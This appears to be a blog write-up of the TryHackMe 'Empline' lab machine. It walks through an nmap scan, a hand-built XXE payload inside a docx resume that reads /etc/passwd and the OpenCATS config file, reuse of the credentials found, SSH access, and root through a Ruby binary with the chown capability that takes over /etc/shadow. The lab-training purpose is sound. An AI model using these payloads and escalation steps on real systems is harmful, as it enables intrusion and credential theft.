root💀muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -oA empline.txt <Target-IP>

┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/empline]
└─$ nmap -sC -sV -oA empline.txt 10.10.46.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-22 15:38 WAT
Nmap scan report for 10.10.46.229
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c0:d5:41:ee:a4:d0:83:0c:97:0d:75:cc:7b:10:7f:76 (RSA)
|   256 83:82:f9:69:19:7d:0d:5c:53:65:d5:54:f6:45:db:74 (ECDSA)
|_  256 4f:91:3e:8b:69:69:09:70:0e:82:26:28:5c:84:71:c9 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Empline
3306/tcp open  mysql   MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
|   Thread ID: 87
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, ConnectWithDatabase, DontAllowDatabaseTableColumn, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsTransactions, IgnoreSigpipes, LongColumnFlag, InteractiveClient, LongPassword, Speaks41ProtocolNew, SupportsCompression, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: X<c](O5YD(8#BdPDEkl\
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.17 seconds

Hello TryHackMe folks damn it been long i know so let hit on a new machine empline release probably last week i guess we have our scan result ready and seems we are having 3 open ports 22,80 and 3306 interesting right?? let start our enumeration with port 80.

image

A nice webpage i will say seems we have some pages let check it out, Going through the pages i found a subdomain on the Employment page job.empline.thm let try to add it our hosts file on our attacking machine.

image

Accessing http://job.empline.thm/ we are presented with a login page which is powered by opencats.

image

What i always check first is version always version and guess what?? opencats is running Version 0.9.4 so i quickly hit google to check if it vulnerable.

image

And i found out OpenCats 0.9.4-2 is vulnerable to ‘docx ‘ XML External Entity Injection (XXE). We also have the exploit written in python on exploit-db but what is the fun without trying it manually why run an exploit when we can learn more from doing it manually.

EXPLOITING THE OPENCATS 0.9.4

image

URL:- http://job.empline.thm/careers/

Now let click on ` current opening positions` .

image

Next:- Now click on Mobile Dev .

image

Next:- Now Click on Apply To Postion .

image

Now the fun part begin let create a file called cv.py with the python code below;-

from docx import Document
document = Document()
paragraph = document.add_paragraph("Muzec")
document.save("resume.docx")

Now let Run the cv.py a resume.docx file has been created. Unzip the resume.docx.

image

cd (change directory) to word/ use your nano editor and open document.xml.

image

After the first line where <?xml starts, embed the following: <!DOCTYPE test [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> .

image

Now let find where our name is written in the document.xml. The code will look something like this:

<w:body><w:p><w:r><w:t>YOUR_NAME</w:t></w:r

image

Now let remove our name and write "&test;". It will look like this:

image

Let Save the file and exit. Go out of the word/ directory and zip our resume.docx back with document.xml using this command zip resume.docx word/document.xml .

image

Now back to our target let upload the resume.docx .

image

Boom and the contents of /etc/passwd is presented to you in the input field. Now what is next is try to find a config file to read using the XML injection yes credentials credentials or a private key for SSH is the main thing.

image

Since OpenCATS is an open source i went on github to check where the config.php file is located before running our exploit to be sure if it has a config.php file or not.

image

Now let zip it back and upload the docx file on the target.

image

Uploading the docx file on the target and boom the config in base64 encoding.

image

Now let decode it using cyberchef.

image

Boom credentials for mysql let hit it.

image

Now let find some credentials to loot.

image

image

image

Boom another credentials probably for SSH first let look up the hash in a databases to crack first.

image

Now let try it on SSH.

image

We are in cool right and we have user.txt already check the passwd file seems we only have 2 users on the system ubuntu and george nothing to worry about the ubuntu user just some normal user.

image

Now let get root checking for SUID and Capabilities.

image

sudo -l nothing on that now SUID.

image

Clean aslo now Capabilities.

image

/usr/local/bin/ruby = cap_chown+ep

Ruby seems interesting with the chown capablity command to change the owner of a file system files now let abuse it.

image

ruby -e 'puts File.chown(1002, 1002, "/etc/shadow")'

Now the shadow file belong us we can easily change the root password sweet right??

image

Now editting the shadow file with nano.

image

Save and exit. Now let use the password with just add to the shadow file with the root user.

image

We are root and done.

Greeting From Muzec



Back To Home